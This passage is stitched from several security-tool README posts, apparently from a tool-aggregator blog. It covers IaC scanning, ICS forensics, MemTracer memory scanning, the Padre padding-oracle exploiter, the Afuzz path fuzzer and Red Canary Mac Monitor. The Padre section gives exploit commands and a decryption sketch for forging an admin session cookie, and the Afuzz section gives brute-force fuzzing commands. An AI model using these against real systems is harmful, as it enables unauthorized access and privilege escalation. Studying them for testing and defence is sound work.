from iac_scan_runner.checks.new_tool import NewToolCheck

B. Create a new instance of the check tool object inside init_checks:

"""Initiate predefined check objects"""
new_tool = NewToolCheck()

C. Add it to the self.iac_checks dictionary inside init_checks:

self.iac_checks = {
    new_tool.name: new_tool,
}

Step 3 – Adding the check tool to the compatibility matrix inside Compatibility class On the other side, inside file src/iac_scan_runner/compatibility.py, the dictionary which represents compatibility matrix should be extended as well. There are two possible cases: a) new file type should be added as a key, together with list of relevant tools as value b) new tool should be added to the compatibility list for the existing file type.

    compatibility_matrix = {
        "new_type": ["new_tool_1", "new_tool_2"],
        "old_typeK": ["tool_1", … "tool_N", "new_tool_3"]
    }

Step 4 – Providing support for result summarization

Finally, the last step in the sequence of modifications required to extend the scan workflow is to modify the ResultsSummary class (src/iac_scan_runner/results_summary.py). Precisely, it is required to append code to its summarize_outcome method that looks for tool-specific strings which can be used to identify whether the check passed or failed. Inside the loop that traverses the compatible checks, the following if-else structure should be included for each new tool:

        if check == "new_tool":
            if outcome.find("Check pass string") > -1:
                self.outcomes[check]["status"] = "Passed"
                return "Passed"
            else:
                self.outcomes[check]["status"] = "Problems"
                return "Problems"

Contact

You can contact the xOpera team by sending an email to xopera@xlab.si.

Acknowledgement

This project has received funding from the European Union’s Horizon 2020 research and innovation programme under Grant Agreement No. 101000162 (PIACERE).



ICS-Forensics-Tools - Microsoft ICS Forensics Framework

By: Zion3R


Microsoft ICS Forensics Tools is an open source forensic framework for analyzing Industrial PLC metadata and project files.
It enables investigators to identify suspicious artifacts in ICS environments and to detect compromised devices during incident response or manual checks. As an open-source framework, it allows investigators to verify the actions of the tool or customize it to specific needs.


Getting Started

These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.

git clone https://github.com/microsoft/ics-forensics-tools.git

Prerequisites

Installing

  • Install python requirements

    pip install -r requirements.txt

Usage

General application arguments:

Args | Description | Required / Optional
-h, --help | show this help message and exit | Optional
-s, --save-config | Save config file for easy future usage | Optional
-c, --config | Config file path, default is config.json | Optional
-o, --output-dir | Directory in which to output any generated files, default is output | Optional
-v, --verbose | Log output to a file as well as the console | Optional
-p, --multiprocess | Run in multiprocess mode by number of plugins/analyzers | Optional

Specific plugin arguments:

Args | Description | Required / Optional
-h, --help | show this help message and exit | Optional
--ip | Addresses file path, CIDR or IP addresses csv (ip column required); add more columns for additional info about each ip (username, pass, etc...) | Required
--port | Port number | Optional
--transport | tcp/udp | Optional
--analyzer | Analyzer name to run | Optional

Executing examples in the command line

 python driver.py -s -v PluginName --ip ips.csv
python driver.py -s -v PluginName --analyzer AnalyzerName
python driver.py -s -v -c config.json --multiprocess

Import as library example

from forensic.client.forensic_client import ForensicClient
from forensic.interfaces.plugin import PluginConfig

forensic = ForensicClient()
plugin = PluginConfig.from_json({
    "name": "PluginName",
    "port": 123,
    "transport": "tcp",
    "addresses": [{"ip": "192.168.1.0/24"}, {"ip": "10.10.10.10"}],
    "parameters": {},
    "analyzers": []
})
forensic.scan([plugin])

Architecture

Adding Plugins

When developing locally make sure to mark src folder as "Sources root"

  • Create new directory under plugins folder with your plugin name
  • Create new Python file with your plugin name
  • Use the following template to write your plugin and replace 'General' with your plugin name
from pathlib import Path
from forensic.interfaces.plugin import PluginInterface, PluginConfig, PluginCLI
from forensic.common.constants.constants import Transport


class GeneralCLI(PluginCLI):
    def __init__(self, folder_name):
        super().__init__(folder_name)
        self.name = "General"
        self.description = "General Plugin Description"
        self.port = 123
        self.transport = Transport.TCP

    def flags(self, parser):
        self.base_flags(parser, self.port, self.transport)
        parser.add_argument('--general', help='General additional argument', metavar="")


class General(PluginInterface):
    def __init__(self, config: PluginConfig, output_dir: Path, verbose: bool):
        super().__init__(config, output_dir, verbose)

    def connect(self, address):
        self.logger.info(f"{self.config.name} connect")

    def export(self, extracted):
        self.logger.info(f"{self.config.name} export")
  • Make sure to import your new plugin in the __init__.py file under the plugins folder
  • In the PluginInterface inherited class there is a 'config' parameter; you can use it to access any data that's available in the PluginConfig object (plugin name, addresses, port, transport, parameters).
    There are two mandatory functions (connect, export).
    The connect function receives a single IP address, extracts any relevant information from the device, and returns it.
    The export function receives the information that was extracted from all the devices, and there you can export it to a file.
  • In the PluginCLI inherited class you need to specify in the init function the default information related to this plugin.
    There is a single mandatory function (flags), in which you must call base_flags, and you can add any additional flags that you want to have.

Adding Analyzers

  • Create new directory under analyzers folder with the plugin name that related to your analyzer.
  • Create new Python file with your analyzer name
  • Use the following template to write your plugin and replace 'General' with your plugin name
from pathlib import Path
from forensic.interfaces.analyzer import AnalyzerInterface, AnalyzerConfig


class General(AnalyzerInterface):
    def __init__(self, config: AnalyzerConfig, output_dir: Path, verbose: bool):
        super().__init__(config, output_dir, verbose)
        self.plugin_name = 'General'
        self.create_output_dir(self.plugin_name)

    def analyze(self):
        pass
  • Make sure to import your new analyzer in the __init__.py file under the analyzers folder

Resources and Technical data & solution:

Microsoft Defender for IoT is an agentless network-layer security solution that allows organizations to continuously monitor and discover assets, detect threats, and manage vulnerabilities in their IoT/OT and Industrial Control Systems (ICS) devices, on-premises and in Azure-connected environments.

Section 52 under MSRC blog
ICS Lecture given about the tool
Section 52 - Investigating Malicious Ladder Logic | Microsoft Defender for IoT Webinar - YouTube

Contributing

This project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.opensource.microsoft.com.

When you submit a pull request, a CLA bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA.

This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact opencode@microsoft.com with any additional questions or comments.

Trademarks

This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow Microsoft's Trademark & Brand Guidelines. Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos are subject to those third-party's policies.



MemTracer - Memory Scaner

By: Zion3R


MemTracer is a tool that offers live memory analysis capabilities, allowing digital forensic practitioners to discover and investigate stealthy attack traces hidden in memory. MemTracer is implemented in Python and aims to detect reflectively loaded native .NET framework Dynamic-Link Libraries (DLLs). This is achieved by looking for the following abnormal memory region characteristics:

  • The state of memory pages flags in each memory region. Specifically, the MEM_COMMIT flag which is used to reserve memory pages for virtual memory use.
  • The type of pages in the region. The MEM_MAPPED page type indicates that the memory pages within the region are mapped into the view of a section.
  • The memory protection for the region. The PAGE_READWRITE protection to indicate that the memory region is readable and writable, which happens if Assembly.Load(byte[]) method is used to load a module into memory.
  • The memory region contains a PE header.

The tool starts by scanning the running processes and analyzing the characteristics of their allocated memory regions to detect reflective DLL loading symptoms. Suspicious memory regions which are identified as DLL modules are dumped for further analysis and investigation.
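To make those checks concrete, here is a minimal sketch of how such a region scan can be written with ctypes on Windows. This is an illustrative approximation, not MemTracer's actual source; the constants are the documented Win32 memory-API flags listed above:

# Illustrative sketch only (Windows); not MemTracer's actual implementation.
import ctypes
import ctypes.wintypes as wt

MEM_COMMIT = 0x1000
MEM_MAPPED = 0x40000
PAGE_READWRITE = 0x04
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_VM_READ = 0x0010

class MEMORY_BASIC_INFORMATION(ctypes.Structure):
    _fields_ = [("BaseAddress", ctypes.c_void_p),
                ("AllocationBase", ctypes.c_void_p),
                ("AllocationProtect", wt.DWORD),
                ("PartitionId", wt.WORD),
                ("RegionSize", ctypes.c_size_t),
                ("State", wt.DWORD),
                ("Protect", wt.DWORD),
                ("Type", wt.DWORD)]

kernel32 = ctypes.windll.kernel32

def suspicious_regions(pid):
    """Yield (base, size) of committed, mapped, RW regions that start with a PE header."""
    proc = kernel32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, pid)
    if not proc:
        return
    mbi = MEMORY_BASIC_INFORMATION()
    addr = 0
    while kernel32.VirtualQueryEx(proc, ctypes.c_void_p(addr), ctypes.byref(mbi), ctypes.sizeof(mbi)):
        if mbi.State == MEM_COMMIT and mbi.Type == MEM_MAPPED and mbi.Protect == PAGE_READWRITE:
            buf = ctypes.create_string_buffer(2)
            read = ctypes.c_size_t(0)
            # "MZ" at the region base is the PE-header heuristic from the list above
            if kernel32.ReadProcessMemory(proc, ctypes.c_void_p(mbi.BaseAddress),
                                          buf, 2, ctypes.byref(read)) and buf.raw == b"MZ":
                yield mbi.BaseAddress, mbi.RegionSize
        addr = (mbi.BaseAddress or 0) + mbi.RegionSize
    kernel32.CloseHandle(proc)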
Furthermore, the tool features the following options:

  • Dump the compromised process.
  • Export a JSON file that provides information about the compromised process, such as the process name, ID, path, size, and base address.
  • Search for specific loaded module by name.

Example

python.exe memScanner.py [-h] [-r] [-m MODULE]
-h, --help show this help message and exit
-r, --reflectiveScan Looking for reflective DLL loading
-m MODULE, --module MODULE Looking for specific loaded DLL

The script needs administrator privileges in order to inspect all processes.



Padre - Blazing Fast, Advanced Padding Oracle Exploit

By: Zion3R


padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption

Features:

  • blazing fast, concurrent implementation
  • decryption of tokens
  • encryption of arbitrary data
  • automatic fingerprinting of padding oracles
  • automatic detection of cipher block length
  • HINTS! If a failure occurs during an operation, padre will hint at what can be tweaked to succeed
  • supports tokens in GET/POST parameters, Cookies
  • flexible specification of encoding rules (base64, hex, etc.)

Demo

Installation/Update

  • Fastest way is to download pre-compiled binary for your OS from Latest release

  • Alternatively, if you have Go installed, build from source:

go install github.com/glebarez/padre@latest

Usage scenario

If you find a suspected padding oracle, where the encrypted data is stored inside a cookie named SESS, you can use the following:

padre -u 'https://target.site/profile.php' -cookie 'SESS=$' 'Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg=='

padre will automatically fingerprint HTTP responses to determine if a padding oracle can be confirmed. If the server is indeed vulnerable, the provided token will be decrypted into something like:

 {"user_id": 456, "is_admin": false}

It looks like you could elevate your privileges here!

You can attempt to do so by first generating your own encrypted data that the oracle will decrypt back to some sneaky plaintext:

padre -u 'https://target.site/profile.php' -cookie 'SESS=$' -enc '{"user_id": 456, "is_admin": true}'

This will spit out another encoded set of encrypted data, perhaps something like below (if base64 is used):

dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

Now you can open your browser and set the value of the SESS cookie to the above value. Loading the original oracle page, you should now see you are elevated to admin level.
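Behind the scenes, attacks like this recover plaintext one byte at a time by abusing the server's padding check. Below is a minimal Python sketch of the core idea, assuming a hypothetical oracle(ciphertext) callback that returns True when the server reports valid padding (the signal padre fingerprints automatically); padre itself is written in Go and adds concurrency and edge-case handling:

# Educational sketch of CBC padding-oracle decryption for one block.
# `oracle` is a hypothetical callback: send ciphertext, return True on valid padding.
def decrypt_block(prev_block: bytes, block: bytes, oracle, bs: int = 16) -> bytes:
    intermediate = bytearray(bs)      # D(block), before the XOR with prev_block
    for pad in range(1, bs + 1):      # force padding value `pad`, right to left
        pos = bs - pad
        # craft a tail so the already-recovered bytes decrypt to `pad`
        tail = bytes(intermediate[i] ^ pad for i in range(pos + 1, bs))
        for guess in range(256):
            forged = bytes(pos) + bytes([guess]) + tail
            if oracle(forged + block):  # real tools also rule out the pad=1 false positive
                intermediate[pos] = guess ^ pad
                break
    # plaintext = D(block) XOR previous ciphertext block (or IV)
    return bytes(i ^ p for i, p in zip(intermediate, prev_block))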

Impact of padding oracles

  • disclosing encrypted session information
  • bypassing authentication
  • providing fake tokens that the server will trust
  • generally, broad extension of attack surface

Full usage options

Usage: padre [OPTIONS] [INPUT]

INPUT:
In decrypt mode: encrypted data
In encrypt mode: the plaintext to be encrypted
If not passed, will read from STDIN

NOTE: binary data is always encoded in HTTP. Tweak encoding rules if needed (see options: -e, -r)

OPTIONS:

-u *required*
target URL, use $ character to define token placeholder (if present in URL)

-enc
Encrypt mode

-err
Regex pattern, HTTP response bodies will be matched against this to detect padding oracle. Omit to perform automatic fingerprinting

-e
Encoding to apply to binary data. Supported values:
b64 (standard base64) *default*
lhex (lowercase hex)

-r
Additional replacements to apply after encoding binary data. Use even-length strings consisting of pairs of characters <OLD><NEW>.
Example:
If server uses base64, but replaces '/' with '!', '+' with '-', '=' with '~', then use -r "/!+-=~"

-cookie
Cookie value to be set in HTTP requests. Use $ character to mark token placeholder.

-post
String data to perform POST requests. Use $ character to mark token placeholder.

-ct
Content-Type for POST requests. If not specified, Content-Type will be determined automatically.

-b
Block length used in cipher (use 16 for AES). Omit to perform automatic detection. Supported values:
8
16 *default*
32

-p
Number of parallel HTTP connections established to target server [1-256]
30 *default*

-proxy
HTTP proxy. e.g. use -proxy "http://localhost:8080" for Burp or ZAP

Further read

Alternative tools



Afuzz - Automated Web Path Fuzzing Tool For The Bug Bounty Projects

By: Zion3R

Afuzz is an automated web path fuzzing tool for the Bug Bounty projects.

Afuzz is being actively developed by @rapiddns


Features

  • Afuzz automatically detects the development language used by the website and generates extensions according to that language
  • Uses a blacklist to filter invalid pages
  • Uses a whitelist to find content on the page that bug bounty hunters are interested in
  • Filters random content in the page
  • Judges 404 error pages in multiple ways
  • Performs statistical analysis on the results after scanning to obtain the final result
  • Supports HTTP/2

Installation

git clone https://github.com/rapiddns/Afuzz.git
cd Afuzz
python setup.py install

OR

pip install afuzz

Run

afuzz -u http://testphp.vulnweb.com -t 30

Result

Table

+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| http://testphp.vulnweb.com/ |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+
| target | path | status | redirect | title | length | content-type | lines | words | type | mark |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+
| http://testphp.vulnweb.com/ | .idea/workspace.xml | 200 | | | 12437 | text/xml | 217 | 774 | check | |
| http://testphp.vulnweb.com/ | admin | 301 | http://testphp.vulnweb.com/admin/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
| http://testphp.vulnweb.com/ | login.php | 200 | | login page | 5009 | text/html | 120 | 432 | check | |
| http://testphp.vulnweb.com/ | .idea/.name | 200 | | | 6 | application/octet-stream | 1 | 1 | check | |
| http://testphp.vulnweb.com/ | .idea/vcs.xml | 200 | | | 173 | text/xml | 8 | 13 | check | |
| http://testphp.vulnweb.com/ | .idea/ | 200 | | Index of /.idea/ | 937 | text/html | 14 | 46 | whitelist | index of |
| http://testphp.vulnweb.com/ | cgi-bin/ | 403 | | 403 Forbidden | 276 | text/html | 10 | 28 | folder | 403 |
| http://testphp.vulnweb.com/ | .idea/encodings.xml | 200 | | | 171 | text/xml | 6 | 11 | check | |
| http://testphp.vulnweb.com/ | search.php | 200 | | search | 4218 | text/html | 104 | 364 | check | |
| http://testphp.vulnweb.com/ | product.php | 200 | | picture details | 4576 | text/html | 111 | 377 | check | |
| http://testphp.vulnweb.com/ | admin/ | 200 | | Index of /admin/ | 248 | text/html | 8 | 16 | whitelist | index of |
| http://testphp.vulnweb.com/ | .idea | 301 | http://testphp.vulnweb.com/.idea/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+

Json

{
"result": [
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/workspace.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 12437,
"content_type": "text/xml",
"lines": 217,
"words": 774,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/workspace.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin",
"status": 301,
"redirect": "http://testphp.vulnweb.com/admin/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words ": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "login.php",
"status": 200,
"redirect": "",
"title": "login page",
"length": 5009,
"content_type": "text/html",
"lines": 120,
"words": 432,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/login.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/.name",
"status": 200,
"redirect": "",
"title": "",
"length": 6,
"content_type": "application/octet-stream",
"lines": 1,
"words": 1,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/.name"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/vcs.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 173,
"content_type": "text/xml",
"lines": 8,
"words": 13,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/vcs.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/",
"status": 200,
"redirect": "",
"title": "Index of /.idea/",
"length": 937,
"content_type": "text/html",
"lines": 14,
"words": 46,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "cgi-bin/",
"status": 403,
"redirect": "",
"title": "403 Forbidden",
"length": 276,
"content_type": "text/html",
"lines": 10,
"words": 28,
"type": "folder",
"mark": "403",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/cgi-bin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/encodings.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 171,
"content_type": "text/xml",
"lines": 6,
"words": 11,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/encodings.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "search.php",
"status": 200,
"redirect": "",
"title": "search",
"length": 4218,
"content_type": "text/html",
"lines": 104,
"words": 364,
"t ype": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/search.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "product.php",
"status": 200,
"redirect": "",
"title": "picture details",
"length": 4576,
"content_type": "text/html",
"lines": 111,
"words": 377,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/product.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin/",
"status": 200,
"redirect": "",
"title": "Index of /admin/",
"length": 248,
"content_type": "text/html",
"lines": 8,
"words": 16,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea",
"status": 301,
"redirect": "http://testphp.vulnweb.com/.idea/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea"
}
],
"total": 12,
"targe t": "http://testphp.vulnweb.com/"
}

Wordlists (IMPORTANT)

Summary:

  • A wordlist is a text file; each line is a path.
  • For extensions, Afuzz replaces the %EXT% keyword with the extensions from the -e flag. If no -e flag is given, the default list is used.
  • Afuzz can also generate a dictionary based on the domain name: it replaces %subdomain% with the host, %rootdomain% with the root domain, %sub% with the subdomain, and %domain% with the domain, and expands %ext% in the same way.

Examples:

  • Normal extensions
index.%EXT%

Passing asp and aspx extensions will generate the following dictionary:

index
index.asp
index.aspx
  • host
%subdomain%.%ext%
%sub%.bak
%domain%.zip
%rootdomain%.zip

Passing https://test-www.hackerone.com and the php extension will generate the following dictionary:

test-www.hackerone.com.php
test-www.zip
test.zip
www.zip
testwww.zip
hackerone.zip
hackerone.com.zip
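For illustration, the placeholder expansion described above can be approximated in a few lines of Python. This is a simplified sketch, not Afuzz's generator (which, as the output above shows, also derives extra variants such as splitting hyphenated subdomains):

# Simplified sketch of %EXT% / domain placeholder expansion for one wordlist line.
from urllib.parse import urlparse

def expand(line, url, extensions):
    host = urlparse(url).hostname               # e.g. test-www.hackerone.com
    parts = host.split(".")
    substitutions = {
        "%subdomain%": host,                    # test-www.hackerone.com
        "%rootdomain%": ".".join(parts[-2:]),   # hackerone.com
        "%sub%": parts[0],                      # test-www
        "%domain%": parts[-2],                  # hackerone
    }
    for key, value in substitutions.items():
        line = line.replace(key, value)
    if "%EXT%" in line or "%ext%" in line:
        return [line.replace("%EXT%", e).replace("%ext%", e) for e in extensions]
    return [line]

# expand("%domain%.zip", "https://test-www.hackerone.com", ["php"]) -> ["hackerone.zip"]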

Options




usage: afuzz [options]

An Automated Web Path Fuzzing Tool.
By RapidDNS (https://rapiddns.io)

options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-o OUTPUT, --output OUTPUT
Output file
-e EXTENSIONS, --extensions EXTENSIONS
Extension list separated by commas (Example: php,aspx,jsp)
-t THREAD, --thread THREAD
Number of threads
-d DEPTH, --depth DEPTH
Maximum recursion depth
-w WORDLIST, --wordlist WORDLIST
wordlist
-f, --fullpath fullpath
-p PROXY, --proxy PROXY
proxy, (ex:http://127.0.0.1:8080)

How to use

Some examples of how to use Afuzz - these are the most common arguments. If you need all of them, just use the -h argument.

Simple usage

afuzz -u https://target
afuzz -e php,html,js,json -u https://target
afuzz -e php,html,js -u https://target -d 3

Threads

The thread number (-t | --threads) reflects the number of separate brute-force tasks, so the bigger the thread number is, the faster Afuzz runs. By default, the number of threads is 10, but you can increase it if you want to speed up the progress.

That said, the speed still depends a lot on the response time of the server. As a warning, we advise you to keep the thread number reasonable, because a very high value can cause a denial of service on the target.

afuzz -e aspx,jsp,php,htm,js,bak,zip,txt,xml -u https://target -t 50

Blacklist

The blacklist.txt and bad_string.txt files in the /db directory are blacklists, which can filter out some pages.

The blacklist.txt file is the same as dirsearch's.

The bad_string.txt file is a text file with one rule per line. The format is position==content, with == as the separator; position has the following options: header, body, regex, title. A sketch of how such a rule can be evaluated is shown below.
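As an illustration, a single rule of this form could be evaluated roughly like this (a sketch, not Afuzz's actual parser; resp is assumed to be a requests-style response object):

# Sketch: evaluate one bad_string.txt rule of the form position==content.
import re

def rule_matches(rule, resp):
    position, content = rule.split("==", 1)
    if position == "header":
        return any(content in f"{k}: {v}" for k, v in resp.headers.items())
    if position == "body":
        return content in resp.text
    if position == "title":
        m = re.search(r"<title>(.*?)</title>", resp.text, re.I | re.S)
        return bool(m) and content in m.group(1)
    if position == "regex":
        return re.search(content, resp.text) is not None
    return False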

Language detection

The language.txt file contains the language-detection rules; the format is consistent with bad_string.txt. It is used to detect the development language the website uses.

References

Thanks to open source projects for inspiration

  • Dirsearch by Shubham Sharma
  • wfuzz by Xavi Mendez
  • arjun by Somdev Sangwan


Red Canary Mac Monitor - An Advanced, Stand-Alone System Monitoring Tool Tailor-Made For macOS Security Research

By: Zion3R

Red Canary Mac Monitor is an advanced, stand-alone system monitoring tool tailor-made for macOS security research, malware triage, and system troubleshooting. Harnessing Apple Endpoint Security (ES), it collects and enriches system events, displaying them graphically, with an expansive feature set designed to surface only the events that are relevant to you. The telemetry collected includes process, interprocess, and file events in addition to rich metadata, allowing users to contextualize events and tell a story with ease. With an intuitive interface and a rich set of analysis features, Red Canary Mac Monitor was designed for a wide range of skill levels and backgrounds to detect macOS threats that would otherwise go unnoticed. As part of Red Canary’s commitment to the research community, the Mac Monitor distribution package is available to download for free.

Requirements

  • Processor: We recommend an Apple Silicon machine, but Intel works too!
  • System memory: 4GB+ is recommended
  • macOS version: 13.1+ (Ventura)

How can I install this thing?

Homebrew? brew install --cask red-canary-mac-monitor

  • Go to the releases section and download the latest installer: https://github.com/redcanaryco/mac-monitor/releases
  • Open the app: Red Canary Mac Monitor.app
  • You'll be prompted to "Open System Settings" to "Allow" the System Extension.
  • Next, System Settings will automatically open to Full Disk Access -- you'll need to flip the switch to enable this for the Red Canary Security Extension. Full Disk Access is a requirement of Endpoint Security.
  • ️ Click the "Start" button in the app and you'll be prompted to reopen the app. Done!


Install footprint

  • Event monitor app which establishes an XPC connection to the Security Extension: /Applications/Red Canary Mac Monitor.app w/signing identifier of com.redcanary.agent.
  • Security Extension: /Library/SystemExtensions/../com.redcanary.agent.securityextension.systemextension w/signing identifier of com.redcanary.agent.securityextension.systemextension.

Uninstall

Homebrew? brew uninstall red-canary-mac-monitor. When using this option you will likely be prompted to authenticate to remove the System Extension.

  • From the Finder delete the app and authenticate to remove the System Extension. You can't do this from the Dock. It's that easy!
  • You can also just remove the Security Extension if you want in the app's menu bar or by going into the app settings.
  • (1.0.3) Supports removal using the ../Contents/SharedSupport/uninstall.sh script.

How are updates handled?

Homebrew? brew update && brew upgrade red-canary-mac-monitor. When using this option you will likely be prompted to authenticate to remove the System Extension.

  • When a new version is available for you to download we'll make a new release.
  • We'll include updated notes and telemetry summaries (if applicable) for each release.
  • All you, as the end user, will need to do is download the update and run the installer. We'll take care of the rest .

How to use this repository

Here we'll be hosting:

  • The distribution package for easy install. See the Releases section. Each major build corresponds to a code name. The first of these builds is GoldCardinal.
  • Telemetry reports in Telemetry reports/ (i.e. all the artifacts that can be collected by the Security Extension).
  • Iconography (what the symbols and colors mean) in Iconography/
  • Updated mute set summaries in Mute sets/
  • AtomicESClient is a separate, but very closely related project showing the ropes of Endpoint Security; check it out in: AtomicESClient/

Additionally, you can submit feature requests and bug reports here as well. When creating a new Issue you'll be able to use one of the two provided templates. Both of these options are also accessible from the in-app "Help" menu.

How are releases structured?

Each release of Red Canary Mac Monitor has a corresponding build name and version number. The first release has the build name of: GoldCardinal and version number 1.0.1.

What are some standout features?

  • High fidelity ES events modeled and enriched with some events containing further enrichment. For example, a process being File Quarantine-aware, a file being quarantined, code signing certificates, etc.

  • Dynamic runtime ES event subscriptions. You have the ability to on-the-fly modify your event subscriptions -- enabling you to cut down on noise while you're working through traces.

  • Path muting at the API level -- Apple's Endpoint Security team has put a lot of work recently into enabling advanced path muting / inversion capabilities. Here, we cover the majority of the API features: es_mute_path and es_mute_path_events along with the types of ES_MUTE_PATH_TYPE_PREFIX, ES_MUTE_PATH_TYPE_LITERAL, ES_MUTE_PATH_TYPE_TARGET_PREFIX, and ES_MUTE_PATH_TYPE_TARGET_LITERAL. Right now we do not support inversion. I'd love it if the ES team added inversion on a per-event basis instead of per-client.

  • Detailed event facts. Right click on any event in a table row to access event metadata, filtering, muting, and unsubscribe options. Core to the user experience is the ability to drill down into any given event or set of events. To enable this functionality we’ve developed “Event facts” windows which contain metadata / additional enrichment about any given event. Each event has a curated set of metadata that is displayed. For example, process execution events will generally contain code signing information, environment variables, correlated events, etc. Below you see examples of file creation and BTM launch item added event facts.

  • Event correlation is an exceptionally important component in any analyst's tool belt. The ability to see which events are "related" to one-another enables you to manipulate the telemetry in a way that makes sense (other than simply dumping to JSON or representing an individual event). We perform event correlation at the process level -- this means that for any given event (which have an initiating and/or target process) we can deeply link events that any given process instigated.

  • Process grouping is another helpful way to represent process telemetry around a given ES_EVENT_TYPE_NOTIFY_EXEC or ES_EVENT_TYPE_NOTIFY_FORK event. By grouping processes in this way you can easily identify the chain of activity.

  • Artifact filtering enables users to remove (but not destroy) events from view based on: event type, initiating process path, or target process path. This standout feature enables analysts to cut through the noise quickly while still retaining all data.

    • Lossy filtering (i.e. events that are dropped from the trace) is also available in the form of "dropping platform binaries" -- another useful technique to cut through the noise.





  • Telemetry export. Right now we support pretty JSON and JSONL (one JSON object per-line) for the full or partial system trace (keyboard shortcuts too). You can access these options in the menu bar under "Export Telemetry".
  • Process subtree generation. When viewing the event facts window for any given event we’ll attempt to generate a process lineage subtree in the left hand sidebar. This tree is interactive – click on any process and you’ll be taken to its event facts. Similarly, you can right click on any process in the tree to pop out the facts for that event.
  • Dynamic event distribution chart. This is a fun one enabled by the SwiftUI team. The graph shows the distribution of events you're subscribed to, currently in-scope (i.e. not filtered), and have a count of more than nothing. This enables you to very quickly identify noisy events. The chart auto-shows/hides itself, but you can bring it back with the: "Mini-chart" button in the toolbar.


Some other features

  • Another very important feature of any dynamic analysis tool is to not let an event limiter or a memory-inefficient implementation get in the way of the user experience. To address this (the best we currently can) we’ve implemented an asynchronous parent / child-like Core Data stack which stores our events as “entities” in-memory. This enables us to store virtually unlimited events with Mac Monitor, although insertions do become more taxing as the event count gets very large.
  • Since Mac Monitor is based on a Security Extension which is always running in the background (like an EDR sensor) we baked in functionality such that it does not process events when a system trace is not occurring. This means that the Red Canary Security Extension (com.redcanary.agent.securityextension) will not needlessly utilize resources / battery power when a trace is not occurring.
  • Distribution package: The install process is often overlooked. However, if users do not have a good understanding of what’s being installed or if it’s too complex to install the barrier to entry might be just high enough to dissuade people from using it. This is why we ship Mac Monitor as a notarized distribution package.

Can you open source Mac Monitor?

We know how much you would love to learn from the source code and/or build tools or commercial products on top of this. Currently, however, Mac Monitor will be distributed as a free, closed-source tool. Enjoy what's being offered and please continue to provide your great feedback. Additionally, never hesitate to reach out if there's one aspect of the implementation you'd love to learn more about. We're an open book when it comes to geeking out about all things implementation, usage, and research methodology.



WebSecProbe - Web Security Assessment Tool, Bypass 403

By: Zion3R


A cutting-edge utility designed exclusively for web security aficionados, penetration testers, and system administrators. WebSecProbe is your advanced toolkit for conducting intricate web security assessments with precision and depth. This robust tool streamlines the intricate process of scrutinizing web servers and applications, allowing you to delve into the technical nuances of web security and fortify your digital assets effectively.


